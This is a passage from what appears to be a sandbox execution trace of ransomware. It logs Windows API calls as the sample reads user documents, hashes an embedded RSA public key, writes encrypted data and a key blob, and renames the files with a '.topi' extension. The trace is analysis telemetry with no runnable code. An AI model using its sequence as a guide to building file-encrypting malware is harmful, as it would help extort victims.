[0096.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0096.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0096.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0096.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0096.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0096.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0096.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0096.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0096.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d97f8 | out: hHeap=0x680000) returned 1 [0096.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0096.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0096.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0096.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0096.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0096.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0096.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0096.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0096.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9828 | out: hHeap=0x680000) returned 1 [0096.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0096.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9810 | out: hHeap=0x680000) returned 1 [0096.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d97e0 | out: hHeap=0x680000) returned 1 [0096.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0096.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0096.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0096.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d97c8 | out: hHeap=0x680000) returned 1 [0096.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a024c8 | out: hHeap=0x680000) returned 1 [0096.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0096.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0096.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0096.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0096.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0096.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0096.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0096.104] WriteFile (in: hFile=0x6a8, lpBuffer=0x99f92d8*, nNumberOfBytesToWrite=0x6162, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99f92d8*, lpNumberOfBytesWritten=0x9ccfb14*=0x6162, lpOverlapped=0x0) returned 1 [0096.105] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f92d8 | out: hHeap=0x680000) returned 1 [0096.105] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x6167, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.105] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0096.105] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0096.105] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd88 [0096.105] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0096.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0096.105] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0096.105] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.105] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd88 | out: hHeap=0x680000) returned 1 [0096.105] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0096.105] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0096.105] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0096.106] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0096.106] CloseHandle (hObject=0x6a8) returned 1 [0096.107] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3f60 [0096.107] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x890) returned 0x31cf750 [0096.107] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3f60 | out: hHeap=0x680000) returned 1 [0096.107] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lt6ZzNEQACj\\FkG4zcTFIH.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lt6zzneqacj\\fkg4zctfih.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lt6ZzNEQACj\\FkG4zcTFIH.odp.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lt6zzneqacj\\fkg4zctfih.odp.topi")) returned 1 [0096.108] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.108] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.108] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31532f8 | out: hHeap=0x680000) returned 1 [0096.109] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x564e58f0, ftCreationTime.dwHighDateTime=0x1d5bdf5, ftLastAccessTime.dwLowDateTime=0x8716b6f0, ftLastAccessTime.dwHighDateTime=0x1d5c168, ftLastWriteTime.dwLowDateTime=0x8716b6f0, ftLastWriteTime.dwHighDateTime=0x1d5c168, nFileSizeHigh=0x0, nFileSizeLow=0x8839, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GcCti_fu.pptx", cAlternateFileName="GCCTI_~1.PPT")) returned 1 [0096.109] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.109] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa6) returned 0x31532f8 [0096.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0096.109] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lt6ZzNEQACj\\GcCti_fu.pptx") returned=".pptx" [0096.109] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lt6ZzNEQACj\\GcCti_fu.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lt6zzneqacj\\gccti_fu.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.110] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=34873) returned 1 [0096.110] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.113] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x8813, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.113] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.114] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.114] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.114] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.114] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x8839, lpOverlapped=0x0) returned 1 [0096.115] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.115] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0096.115] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.115] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.115] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df1a0) returned 1 [0096.116] CryptCreateHash (in: hProv=0x6df1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.116] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.116] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0096.116] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.116] GetLastError () returned 0x0 [0096.116] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.116] CryptReleaseContext (hProv=0x6df1a0, dwFlags=0x0) returned 1 [0096.116] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.116] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.116] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.116] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.116] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8840) returned 0x99f92d8 [0096.117] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a024c8 [0096.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d97c8 [0096.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02510 [0096.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d97e0 [0096.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9810 [0096.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0096.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9828 [0096.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.117] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0096.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9810 | out: hHeap=0x680000) returned 1 [0096.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9828 | out: hHeap=0x680000) returned 1 [0096.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0096.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0096.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0096.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9828 [0096.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0096.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9810 [0096.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0096.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9828 | out: hHeap=0x680000) returned 1 [0096.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9810 | out: hHeap=0x680000) returned 1 [0096.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0096.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0096.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.119] GetCurrentThreadId () returned 0x8c4 [0096.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0096.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f76e0 [0096.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0096.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.119] GetCurrentThreadId () returned 0x8c4 [0096.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0096.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0096.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0096.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0096.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9810 [0096.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0096.120] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9828 [0096.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d97f8 [0096.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.121] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0096.121] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.122] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lt6ZzNEQACj\\GcCti_fu.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lt6zzneqacj\\gccti_fu.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lt6ZzNEQACj\\GcCti_fu.pptx.topi" (normalized: 